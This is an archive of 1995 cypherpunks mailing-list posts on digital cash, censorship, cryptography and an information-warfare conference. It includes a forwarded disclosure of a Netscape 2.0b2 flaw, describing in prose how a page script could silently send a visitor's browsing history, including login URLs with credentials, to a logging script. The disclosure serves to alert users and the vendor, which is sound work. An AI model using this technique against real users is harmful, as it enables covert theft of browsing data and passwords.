"It's not only ridiculous - it's unfair, un-American and
unconstitutional," said Eileen Kent, vice president of new
media at Playboy Enterprises Inc. She finds it
"incomprehensible" that the on-line version of Playboy could
be deemed illegal while the printed magazine isn't. "Are they
going to send me to jail and fine me a hundred grand because
I put a Playmate on the Net?" she asked. If so, "then I'm
quitting."

House conferees hammering out a sweeping telecommunciations
bill voted 17-16 on Wednesday to make it illegal for anyone to
knowingly display indecent material that can be viewed by a
minor, punishable by a $100,000 fine and up to two years in
prison.

Yesterday, critics tried to counter punch. The American Civil
Liberties Union is preparing a court challenge on First
Amendment grounds. The Center for Democracy and Technology, a
cyberspace civil-liberties group, vows to do the same. On-line
services drafted a letter of protest to House Speaker Newt
Gingrich, who has opposed earlier attempts to impose
restrictions on Internet fare.

On-line advocates also are pushing for a new vote by the House
conferees to define just what "indecency" means. They are
hoping the 17-16 balance of the first vote is tenuous enough
to allow them to ease the restrictions in defining the terms.
Backed by the hectic lobbying efforts, Rep. Rick White of
Washington state, who favors a less-restrictive approach, and
allies have begun laboring to devise a limited definition of
indecency that would be acceptable to civil libertarians and
smut-fighters alike.

Without a clearer, limited definition, the "indecency"
standard faces the almost certain prospect of being struck
down by the courts as unconstitutional, the White forces
contend.

On-line experts, moreover, argue the latest measure could
create big problems and unintended consequences. If one 16-
year-old zaps lewd fare to another, could the sender be
imprisoned? If an adult makes a racy observation on an
electronic bulletin board and a minor tracks it down and reads
it, should the adult be punished?

Last week, America Online Inc., in an effort to strike
vulgarity from members' personal on-line "profiles," decided
to strike all uses of the word "breast" - and thereby erased
the biographies of scores of women who had breast cancer.

AOL "responded to the climate of fear created by Congress,"
Mike Godwin, legal counsel for the Electronic Frontier
Foundation. An AOL spokeswoman said the deletions were "a
mistake on our part."

Robert L. Smith, executive director of the Interactive
Services Association, said such snafus could occur more and
more as Internet access providers fret about whether their
so-called content might be deemed indecent. "It's going to
cause confusion, industry uncertainty and years of litigation,
which will result in Congress not solving the problems they
wanted to solve," Mr. Smith said.

The crackdown effort, moreover, may be fruitless in a global
computer network that reaches more than 150 countries. "Those
American laws don't apply to me," said Patrick Groeneveld, a
professor at Delft University in the Netherlands. Mr.
Groeneveld, who once ran a popular Internet archive that
included pornographic material, said Congress's efforts amount
to U.S. "imperialism."

"I didn't vote for America's congressmen," he said.

"Legislators and some consumers don't understand the
Internet," said Jerry Berman, executive director of the Center
for Democracy and Technology. "So, it becomes an easy target
for political posturing."

-- Albert R. Karr contributed to this article.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 8 Dec 95 13:00:13 PST
To: cypherpunks@toad.com
Subject: Re: BoS: Netscape 2.0b2 allows for invasion of privacy (fwd)
Message-ID: <acede76f100210042c9a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:33 PM 12/8/95, Bill Kuhn wrote:
>Talking of Netscape - this posting prompted me to forward it given the
>security and privacy implications inherent in the problem.
>
>Cheers
>Graeme
>
>------- Start of forwarded message -------
>>From: Scott Weston <scott@tripleg.com.au>
>>Subject: Netscape 2.0b2 allows for invasion of privacy
>>Newsgroups: aus.net.announce,comp.privacy
>>Date: Fri, 01 Dec 1995 11:09:06 +1100
>
>Hi 'Net Dwellers,

"'Net Dwellers" or "Det Weilers"? Hmmhhh....

In any case, this has already come up a couple of times on the Cypherpunks
list, and was even commented upon by Jeff Weinstein of Netscape a couple of
days ago. The bug was fixed in b3.

I really encourage people who are not following the list more carefully to
check the back traffic before posting bug reports.

Forwarding messages is often the culprit in this, as the forwarder simply
assumes we may be interested, but he has himself not been following the
thread.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Pierson" <wfgodot@iquest.com>
Date: Fri, 8 Dec 95 12:21:20 PST
To: cypherpunks@toad.com
Subject: "Information Technology for Control of Money Laundering"
Message-ID: <199512082022.OAA18480@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've just finished perusing the Office of Technology Assessment's
"Information Technology for Control of Money Laundering"
<ftp://otabbs.ota.gov/pub/pdf/money.laundering/*.pdf>.  It's an
informative and fascinating document for anyone interested in the
issues of money laundering and its implications for the future of
digital currency, as well as its increasing role as an important
rationale in promoting government surveillance agendas. 

Broken into seven chapters, this document provides a valuable overview
of the subject from the government's perspective.

1. "Electronic Money Laundering" covers the ABCs of money
laundering and its connection to drug trafficking, terrorism and the
global underground economy.  It traces the relevant statutory history
from the Bank Secrecy Act of 1970 onward. 

2. "Mechanisms of Wire Transfer" examines the basics of wire transfers
and the details of the FEDWIRE, CHIPS and SWIFT systems.

3. "Money Laundering and Law Enforcement" examines the laws and 
regulations involved and the various Federal and State Agency roles
and responsibilities.

4. "Technologies for Detecting Money Laundering" is particularly
interesting.   It discusses the FinCEN Artificial Intelligence System
(FAIS), and AI approaches including Expert Systems, Link Analysis,
Neural Network techniques, Machine Learning and various statistical
modeling methods.

5. "Privacy and Confidentiality" covers different investigative
prerogatives, the legal history and case law of privacy jurisprudence,
aspects of individual and corporate confidentiality, etc...

6. "International Issues" explores off-shore banking, international
law enforcement efforts like the Financial Action Task Force (FATF)
and the subject of bilateral and multilateral cooperative agreements
and conventions.

7. "Conclusions and Policy Options" discusses money laundering and the
world economy, and various policy directions for the future as well as
the type of monitoring regimes that might be established.  It pays
particular attention to the subject of the future impact of digital
money, observing: 

 "As alternative modes of electronic payment, e.g., "digital cash",
 develop, whatever precedents are set for access to wire transfers
 might also be applied to these alternatives.  If not, digital cash,
 or "the electronic purse" may provide another channel for dirty
 money, so that monitoring of wire transfers will no longer be
 effective."

I noticed that major network news reports on the "growing threat" of
money laundering were particularly evident in close temporal
conjunction to the wide public coverage of the latest FBI CALEA
revelations.  Just coincidence, I guess...


Bonus: While your there you might want to (if you haven't yet) pick up
another OTA document entitled "Electronic Surveillance in a Digital
Age"  which provides some useful additional government position
tracking data on the legal and technical aspects of CALEA.  It's
available in both text <ftp://otabbs.ota.gov/pub/elec.surveil/*.txt>
and PDF <ftp://otabbs.ota.gov/pub/pdf/elec.surveil/*.pdf> formats. 


- -Michael


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMidCtGJlWF+GPx9AQGROQP+KtumqozBLlFgupOCcoKRIk6udFz0jRt4
Vt1y1noiV0tJCE2XQdEGiU7KhRHDC8QX+Zi1wxVqnlhxNI8hF5g4nDGf+DHyw54r
KsXce7fJvPVZ3dn69dYIQ70gpa6BfAvsFXGAP9gnL3RxnxxYGfBknp2xdz0SiBQv
t0bnWwIab68=
=bWRK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Dec 95 14:34:17 PST
To: Mark Twain Ecash Support <support@marktwain.com>
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512082234.OAA02297@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 PM 12/8/95 -0600, Mark Twain Bank Ecash Support wrote:
>>There's no need to send that payment info in the clear -- why not encrypt?
>
>DigiCash agrees that it is desirable to encrypt the payment request. The
>problem is how? You can't use the payor's public key, since the payor is
>anonymous to the payee. There are other, high overhead, protocols that might
>be used, but after taking MIM into account, securing the payment request
>from within Ecash while retaining acceptable latency is much harder to
>acomplish than one might think. 

Obviously if the payer is the one transmitting the message, she doesn't
use her public key to encrypt; hers would be used for signature if appropriate.
She should use the payee's public key, or some negotiated key like DH.
It doesn't lose any privacy, because she already knows an address to send
the money to, and the payee can create a public key for that address,
or some other public key he makes available to payers.

>The best solution at this time seems to be to use the already existing https
>connection to transmit the payment request. The next version of Ecash will
>offer this feature as an option to the user.

I had assumed that the payment information wasn't encrypted because that's a
separate problem from the basic digicash, and because if the payer wants
to keep the transaction private, she probably also needs to encrypt the
other side
of the transaction - e.g. the request for n widget at $d/widget.
https or other ssl connection, or an encrypted telnet, or encrypted email,
or some other protected mechanism all would seem to be appropriate.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 8 Dec 95 11:32:20 PST
To: jfricker@vertexgrp.com (John Fricker)
Subject: Re: Anyone know of a white paper on security?
In-Reply-To: <199512081938.LAA01395@vertex.vertexgroup.com>
Message-ID: <199512081937.OAA03591@homeport.org>
MIME-Version: 1.0
Content-Type: text


John Fricker wrote:
|     The question I'm seeking to answer is : 
| 
| What criteria should be used to determine whether a scripting
| language such as Java, LiveScript, etc. is secure? 
| 
| There are obvious issues such as access to the file system but has
| anyone thought this all the way through and codified a white paper? 

	First you need to decide what you mean by secure.  Then you
need to prove your code is correct, and conforms to the spec.  Any
high school student could do it.  :)




-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 8 Dec 95 13:19:00 PST
To: Jerry Whiting <cypherpunks@toad.com
Subject: Re: The Elevator Problem
Message-ID: <acedea6511021004dea8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:47 PM 12/8/95, Jerry Whiting wrote:
>A group of us have been wrestling with a problem and I'd like to ask for some
>outside help.  We've come to call it the Elevator Problem.
>
>Alice and Bob want to establish a secret in from of Eve.  In other words,
>they want to agree on a secret key in an elevator full of Eve's.

Isn't this just the "subliminal channels" scenario? Originally phrased in
terms of prisoners under the watchful eyes of their jailers nevertheless
establishing a private communication channel?

Schneier describes this beginning on page 66 (of his 1st edition).

Your scenario looks identical to this. So you should check out the papers
on this in the Crypto Conference proceedings.

As to whether you can implement this without using patented algorithms, I
don't know. Not enough information given.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Cooper <jcooper@virtu.sar.usf.edu>
Date: Fri, 8 Dec 95 11:59:19 PST
To: jim bell <jimbell@pacifier.com>
Subject: Re: More FUD from First Virtual
In-Reply-To: <m0tO6o4-00091AC@pacifier.com>
Message-ID: <Pine.SUN.3.91.951208145002.25221B-100000@virtu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> >I *am* skeptical about the extent to which anonymous cash *can* succeed,
> 
> What can stop it?  What should stop it?

   The US government can stop it.  It is irrelevant what *should* stop 
it, but it's extremely useful to note that the US government's political 
climate of paranoia and FUD in general will certainly not allow truly 
anonymous cash systems inside of our country in the forseeable future.

- -jon

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMiXeEjEaxpIF0UlAQGHggH7Bn8hrxKHsUHq0uqf7WXBxEVn4hMVofOu
HpmdmGZei4hvEwDnJ8Z8oN/BoVS5Sx4K59FItbofnRZvTn4SZAS3ug==
=rskN
-----END PGP SIGNATURE-----
 
--------------------------------------------------------
Jon Cooper 			     squeamish ossifrage




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 8 Dec 95 14:52:17 PST
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <Pine.LNX.3.91.951208171531.16447B-100000@micro.internexus.net>
Message-ID: <Pine.ULT.3.91.951208144730.21084P-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Laszlo Vecsey wrote:

> Would it be possible for the Cypherpunks mailing list remailer to parse the 
> Subject line to include a CP: at the beginning, or some notation so that 
> Cypherpunk messages can be easily 'filtered' out from my Inbox?

Majordomo always includes a Sender: owner-cypherpunks@toad.com header. 
You'd know this if you used, say, Microsoft Exchange, Microsoft Mail, or
some other broken mail gateway. Procmail or whatever should be able to 
filter mail based on this.

You can also read cypherpunks courtesy of http://www.hks.net/ (no,
Cyberia-L isn't there), or nntp.hks.net. Lots of people do this. I prefer
to deal with receiving the list in my personal mailbox because I don't
like waiting for downloads in real time. 
 
> Also, about Microsoft's .PWL file format. Will they be releasing the 
> new encryption method? Or are we not supposed to feel safe that our 
> passwords are protected in Windows95.

I asked a related question of one of the networking program managers 
today; I think the answer is yes. I'll forward this to see if he'd like 
to make a public comment.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 8 Dec 95 13:17:27 PST
To: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Subject: Re:Internet Stocks
In-Reply-To: <199512081645.AA18510@sunstorm.corp.cirrus.com>
Message-ID: <9512082118.AA02278@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Ashfaq Rasheed writes:
 > Can this be made a regular feature on the list?

Yea, Tim, will you manage my portfolio for me?  I keep getting the
"buy low/sell high" rule mixed up.



[ :-) for the impaired. ]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 8 Dec 95 15:27:59 PST
To: zen@bi.fish.com
Subject: Rally in SanFran meatspace to protest censorship in cyberspace!
Message-ID: <9512082327.AA23714@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Spread the word!

                *** NETIZENS!! RALLY AGAINST CENSORSHIP ***

Amendment I: "Congress shall make no law ... abridging the freedom of
speech, or of the press; or the right of the people peaceably to assemble."


     **PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST **

It's like illiterates telling you what to read. On December 6 members of
the House Conference Committee on Telecommunications Reform approved a
proposal to censor free speech in cyberspace. If the measures are adopted,
the Net and online media will become the most heavily regulated media in
the United States. They *will not* enjoy the First Amendment freedoms now
afforded to print media. Instead, online publishers and users will be held
to a vague and patently un-Constitutional "indecency" standard. "Violators"
will be subject to fines of up to $100,000 and prison terms of up to five
years.

In response, ALL members of the Bay Area media, online, Internet, new
media, and telecommunications communities are invited to participate in a
protest rally to express our outrage that the politicians in Congress
(which is not even connected to the Internet!) are attempting to destroy
our First Amendment rights in cyberspace, and directly attack our
livelihoods.

Help stop the demagogs in Washington! There is nothing "decent" about
denying free speech to us, our children, and our children's children.
Preserve our Constitutional rights! Join us!

WHEN: Monday, December 11, 1995  12:00 - 1:00 PM

WHERE: South Park (between 2nd and 3rd, Bryant and Brannon) San Francisco.

SPEAKERS: To be announced  [including John Gilmore, Jim Warren, Dave
Winer, Mike Godwin, Howard Rheingold]

BRING: Attention-grabbing posters, signs, and banners that demonstrate your
committment to free speech and expression, and your feelings about
Congress.

FOR UPDATED INFORMATION: http://www.hotwired.com/staff/digaman

(Although this event is being organized in the offices of Wired magazine
and HotWired, we are *actively* seeking participation and support from all
members of the local community. Please forward this message to anyone you
think should attend, and to all relevant news groups.)

CONTACT: Todd Lappin -- 415-222-6241 -- protest@wired.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bkuhn@scientech.com (Bill Kuhn)
Date: Fri, 8 Dec 95 12:38:23 PST
To: cypherpunks@toad.com
Subject: BoS: Netscape 2.0b2 allows for invasion of privacy (fwd)
Message-ID: <199512082033.PAA18711@rex.scientech.com>
MIME-Version: 1.0
Content-Type: text/plain



Talking of Netscape - this posting prompted me to forward it given the
security and privacy implications inherent in the problem.

Cheers
Graeme

------- Start of forwarded message -------
>From: Scott Weston <scott@tripleg.com.au>
>Subject: Netscape 2.0b2 allows for invasion of privacy
>Newsgroups: aus.net.announce,comp.privacy
>Date: Fri, 01 Dec 1995 11:09:06 +1100

Hi 'Net Dwellers,

First off - I've posted this before (however not to this group) and only
got a response from the Netscape Corp.  They were glad I found the
problem and said that they would fix it, however I feel that people
should know about it.  Also I would like people to help me spread this
document around, i.e. if you know of a newsgroup (or people) that would
find this interesting then please re-postit.

On with the problem...

I've recently got hold of the latest netscape, and was (at first) very
excited about the new "LiveScripts" that it supports.  If people don't
yet know - these "LiveScripts" allow you to put small programs into your
web page that is then executed by the Netscape client.  There is no
DIRECT way for these programs to send information back to the owner of
the web page, however I was able to do it in a not-so-direct way.

The "LiveScript" that I wrote extracts ALL the history of the current
netscape window.  By history I mean ALL the pages that you have visited
to get to my page, it then generates a string of these and forces the
Netscape client to load a URL that is a CGI script with the QUERY_STRING
set to the users History.  The CGI script then adds this information
to a log file.  Now if this hasn't quite CLICKED yet lets do a little
example.

Johnny Mnemonic starts up his newly acquired version of Netscape2.0b2
to start his daily "surf" session.  First he decides to check his CD-NOW
purchase and uses the handy Auto-Login URL.  Then he decides to go to
Lycos and do a search.  In his search he find my page, which he decides
to visit.  Suddenly he is transported, not to my main page but to one
of my CGI scripts, which in turn happens to have ALL the URL's he just
been to in it.  This means that in my log will be:

  - the URL to use to get into CD-NOW as Johnny Mnemonic, including
    username and password.
  - The exact search params he used on Lycos (i.e. exactly what he
    searched for)
  - plus any other places he happened to visit.

I do this in a way that the user will KNOW that it has happened and
will _hopefully_ email Netscape and tell them they are NOT impressed.
But it would be EASY for me to change the CGI script so that the user
is unaware that it has actually happened, unless they closely examine
their URL history (in fact they'll probably just think its a netscape
bug).


If you're skeptical about this then do the test yourself.  Get netscape
2.0b2 and do some normal surfing, and then go to Lycos.  Do a search for:

  scotts car boot sale

which should return the URL - http://www.tripleg.com.au/staff/scott

Click on the URL and sit back an watch.  First my main page will show up
but a little while later you should be transported to a CGI bin script
that will show you your URL history.

I have tested this with both the Linux 2.0b2, and Solaris 2.0b2 versions
and both have done the same thing.  I would be interested in knowing if
it happens for ALL versions of Netscape2.0b2.  The log file does log
the User Agent (i.e. the name of the platform you are using) so by simply
going to the page I will know that your version of Netscape is also
open to this form of attack.

Currently I can find no way to configure Netscape2.0b2 to NOT run
LiveScripts - and at the very least this option should be quickly
added to the next version of netscape to be released.  But a far
better solution (IMHO) would be for netscape to pop up a window before
running the LiveScript and let you know what the LiveScript wants access
to, e.g. if it only wants to print out the current time then that's
OK, but if it wants to read my history list and then transport me to
a CGI script and add me to a logfile then maybe I would say NO.

I think I've said enough....

If you've got any further questions, or want some more information just
email me : scott@tripleg.com.au

--
Scott.

Quote from a car accident insurance claim: "I told the police that I was
not injured, but on removing my hat, I found that I had a skull fracture."
------- End of forwarded message -------










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 8 Dec 95 12:33:26 PST
To: Jon Cooper <jcooper@virtu.sar.usf.edu>
Subject: Re: More FUD from First Virtual
Message-ID: <2.2b8.32.19951208203419.006933d4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:52 PM 12/8/95 -0500, Jon Cooper wrote:

>   The US government can stop it.  It is irrelevant what *should* stop 
>it, but it's extremely useful to note that the US government's political 
>climate of paranoia and FUD in general will certainly not allow truly 
>anonymous cash systems inside of our country in the forseeable future.

But who's going to ask?  If an anonymous payment system springs up outside
the US, we can use it as a store of value if nothing else or for shopping
overseas. 
Domestically, we can convert non-anonymous payment systems into
semi-anonymous ones.  What counts is difficulty of transaction and market
demand not legal structure.  Thus, about five minutes after the "temporary
VISA card" travelers check substitutes are issued, I can start selling them
for (discounted) cash to all comers.  Likewise Ecash laundry servers letting
anonymous people use non-anonymous Ecash.

It remains to be seen how much customers value anonymity.  There should be a
niche market in any case.

DCF

"Every man his own ISP."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Fri, 8 Dec 95 13:34:58 PST
To: tcmay@got.net
Subject: Re: GAK and Self-Incrimination?
Message-ID: <01HYKKMGLV4Q9S3T6Q@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  8-DEC-1995 13:28:32.69

Given that GAK means one never knows if the government is listening, could
a person claim protection against self-incrimination as a reason to not use
GAK, and get away with it? (This is different from the phone system, which
may also be tapped. The analogy would be the same if the government forced
one to pick a telephone it could tap over one it could not, which so far
has not been the case, but which soon may be if switching systems which are
not compliant with Digital Telephony Act provisions are shut down.)

Consider this hypo: I send an encrypted message to a partner in crime
containing plans for future crimes and descriptions of past crimes. I don't
GAK the message. The government prosecutes me under the Anti-Terrorism and
Child Protection Act of 1997.

My defense? That GAKKing the message would be tantamount to incriminating
myself, which the Fifth Amendment protects me against.
-------------------
	There is the problem with this argument that personal diaries have
recently (Packwood) been found to not fall under the Fifth amendment. However,
IA(most definitely)NAL.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Fri, 8 Dec 95 13:30:19 PST
To: eroberts@cmp.com
Subject: InfoWarCon
Message-ID: <199512082134.QAA23960@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



P L E A S E  D I S T R I B U T E  W I D E L Y 

             InfoWarCon (Europe) '96
        Defining the European Perspective
               Brussels, Belgium
                 May 23-24 1996 


Sponsored by:

  National Computer Security Association
  Winn Schwartau, President and CEO, Interpact, Inc.
  Robert David Steele, Chairman & CEO, OPEN SOURCE SOLUTIONS 


Information Warfare represents a global challenge that faces all 
late-industrial and information age nation states.  It also represents 
the easiest and cheapest way for less developed nation-states and 
religious or political movements to anonymously and grieviously attack 
major nations and international corporations.

Not only are the definitions of InfoWar unclear, but they span many 
areas and disciplines. This conference will examine the European 
perspectives on all three classes of Information Warfare while 
contributing some American lessons learned, mistakes made and successes 
enjoyed.

	Class I: Personal Privacy
	Class II: Industrial and Economic Spying and Warfare
	Class III: Global Conflict, Terrorism and the Military

As at all other InfoWarCon, this special European Conference encourages 
active audience participation, contribution and debate. 


May 22, 1996

17:00 - 20:00	Pre-Registration						
	
18:00 - 21:00	Hosted Cocktail Party with Music

		Most conference speakers will be in attendance.  Meet
		Mr. Schwartau and Mr. Steele. 

May 23, 1995

07:00 - 08:30	Registration							

07:00 - 08:30	Sponsored Continental Breakfast				

PLENARY SESSIONS

08:30 - 09:00	Keynote Speech							

		Major General William Robbins
			Assistant Chief Of Staff, Command, Control, 
			Communications, Computing, and Information
			Ministry of Defence, United Kingdom (Invited) 

	
09:00 - 10:00	"Information Warfare: Chaos on the Electronic Superhighway"	

		Winn Schwartau
			President and CEO, Interpact, Inc., USA
	
		An overview of Information Warfare from the civilian 
		perspective by one of the world's leading experts on the 
		subject. This will be an eye-opening presentation with 
		time reserved for questions from the audience.  
		Mr. Schwartau will be available throughout the conference 
		for personal and private discussions as well as book 
		signings.

10:00 - 11:15	Military View of Information Warfare				

		Moderator:
			Captain Patrick Tyrell
			  Assistant Director, Information Warfare Policy, 
				Ministry of Defence, United Kingdom
		Panel:
			The German View 
			The Russian View 
			The Croatian View 

11:15 - 11:45	Sponsored Break							

11:45 - 13:00	Law Enforcement in Cyberspace: 
			Cooperation is the Key: Panel	

		Moderator:
			Winn Schwartau, Interpact, Inc.
		Panel:
			Interpol 
			Surite 
			FBI 
			Netherlands 

		How will global partners respect each other's laws and 
		cooperate in their enforcement? Will extradition for 
		cyber-crimes become necessary? Leading experts will walk 
		us down the paths to success and offer lessons learned on 
		failures and risks.

13:00 - 14:30	Lunch 								
	
13:30 - 14:00	Special Luncheon Presentation 

BREAKOUT SESSIONS

14:30 - 16:00

Breakout I:	Threats to European Civil Prosperity

		Moderator:
			Admiral Lacoste/General Heinrich, France (Invited)
		Panel:
			Belgium
			Germany 
			United Kingdom 

		Europe is becoming as dependent upon its econo-technical 
		infrastructure more than ever with the design and 
		construction of the European Space Initiative. 
		Communications systems create the basis for global 
		commerce, transportation systems permit the distribution 
		of goods, the financial infrastructure is a requisite 
		component of any information based economy and the power 
		grid glues it all together. But, the threats to their 
		stability and integrity are many and must be dealt with 
		on a continent that has a history of war and more recently 
		terrorism. What are the risks? The rewards? 
		And the solutions?

Breakout II:	Information Warfare: Support for Conventional War Fighting

		Moderator: TBD 
		Panel:
			US - Gen. Jim McCarthy USAF (Ret)
			Russia
			Netherlands

		Conventional Wars and regional conflicts are replacing the 
		fear of East-West conflict. Advanced Industrial and 
		Information Age societies will supplement their armed 
		forces with enhanced information processing capabilities. 
		What are they and will they change the face of war?

16:00-16:30	Sponsored Break							

PLENARY SESSION

16:30 - 18:00	"Hackers: National Resources or Merely Cyber-Criminals?"

		Moderator:
			Mich Kabay, Ph.D.
			Director of Education, NCSA and 
			Robert Steele, President, OSS, Inc.

		Panel:
			Hactic and The Digital City Experiment: 
				Amsterdam, Netherlands (Invited)
			Hacker, United Kingdom 
			CHAOS Computer Club, Germany 

		Are hackers merely criminals operating under the guise of 
		Internet freedom? Or are they national resources to be 
		cultivated and who have served as an early warning system 
		for Cyberspace? One group of American hackers have 
		threatened to "Declare War on France" on behalf of American 
		interests. How do we as nations deal with this?

		Mich Kabay and Robert Steele will debate the issue and then 
		you will meet the hackers in person. The first Information 
		Warriors invite your questions, comments and interaction. 
		Learn first hand who they are, what they believe and how 
		they function. 

18:00 - 21:00	Hosted Reception						

21:00 - 23:00	"Dutch Dinners" for Birds of a Feather				
			Rallying points will be provided.

May 24, 1996

07:00 - 8:30	Sponsored Continental Breakfast 				

08:30 - 9:00	Keynote Speech							

		"Efforts to Maximize Information As New Age Weapon" (TBD)

PLENARY SESSIONS

9:00 - 10:00	"Creating Smart Nations Through National Information 
		Strategies: Intelligence And Security Issues"	

		Robert David Steele, President, OSS, Inc. US

		Planning for the future requires new thinking and a new 
		"triad" of defense: Open Source Intelligence, Electronic 
		Home Defense and Information Warfare. 21st Century realities 
		invite dozens more players whom must be monitored and 
		controlled. Governments and the military should avail 
		themselves of the publicly available open source 
		information as part of their ongoing intelligence 
		operations. Mr. Steele has suggested that nations should 
		"draft" the civil sector by requiring 'due diligence' and 
		very high standards of private sector communications and 
		computing security.

10:00 - 11:15 	"The Convergence of Military and Commercial Vulnerabilities" 	

		Moderator:
			Winn Schwartau, President and CEO, Interpact, Inc.
		Panel:
			Bob Ayers, DISA, Department of Defense, US
			Holland / Belgium 
			UK
			France 

		Much of military success depends upon the reliable operation 
		of civilian and commercial systems. No longer do the 
		government and military and private sector function in 
		isolation. What levels of cooperation are required to 
		assure proper defense and war fighting capability? How much 
		of the private sector must be viewed as a national security 
		asset - to be protected as much as is a forward deployed 
		military unit?

11:15 - 11:45	Sponsored Break							

11:45 - 13:00	Societal Impact of Information Warfare 				

		Moderator:
			Winn Schwartau, President and CEO, Interpact, Inc.

		Society is absolutely dependent upon technology; without 
		networks and computers and communications, portions of 
		society can collapse within days. If major systems fail, 
		what will the reaction of a techno-reliant society be? 
		And, what are the ethics of a military who instigates the 
		collapse of an adversary's civilian infrastructure rather 
		then resort to bombs and bullets? Is a techno-phobic 
		society psychologically prepared for the consequences?

13:00 - 14:30	Lunch 								

13:30-14:00	Special Luncheon Presentation 

BREAKOUT SESSIONS

14:30 - 16:00

Breakout I:	Legislation & Personal Privacy: 
			A Global Electronic Bill of Rights?

		Moderator:
			General Pickering, Canada (Invited) 
		Panel:
			Electronic Privacy International (Invited)
			Sweden 
			The Vatican 

		This panel will examine the different approaches governments 
		take to protect the personal privacy of their citizens and 
		what steps need to be taken to create a global consensus. 
		How do differing privacy laws affect countries ability to do 
		business? How will authoritarian regimes counter the 
		perceived threat of free and open information flow?

Breakout II:	"Industrial Espionage: An Update"

		Moderator:
			DST, France (Invited)  - (RS)
		Panel:
			Surite tells all 
			Kroll Associates US 
			Germany

		122 Countries are actively engaged in industrial and 
		economic espionage to the benefit of their respective 
		states.  It's a lot easier for a third world or agrarian 
		society to steal intellectual and proprietary property than 
		to invest time and resources develop their own. Who's 
		involved and what are they doing? What steps need to be 
		taken to defend such actions? 

16:00 - 16:30	Sponsored Break							

PLENARY

16:30 - 18:00	Defining War in the Information Age
			"The New National Security"

		Brief comments by Winn Schwartau and Robert Steele - 
		and then a lively interactive audience debate.

		An enemy bomb landing in any country can be easily 
		construed as an act of war.  However, in Cyberspace, 
		anonymous acts of aggression that lead to war or replace 
		conventional attacks are not so simple to classify.

		This highly charged subject will consider what war is 
		and what it isn't: 

		- Is an attack against a financial institution an act of war?
		- What about the intentional collapse of a communications 
			infrastructure?
		- Is human lethality a necessary pre-requisite for war?
		- Do we need to redefine national security for the post 
			Cold-War world?

18:00 - 18:10 	Closing Comments

18:00 - 20:00	No-Host Reception						



Hotel Information:

	Hotel Palace
	rue Gineste 3
	1210 Brussels
	Belgium

	+32 2 203 62 00
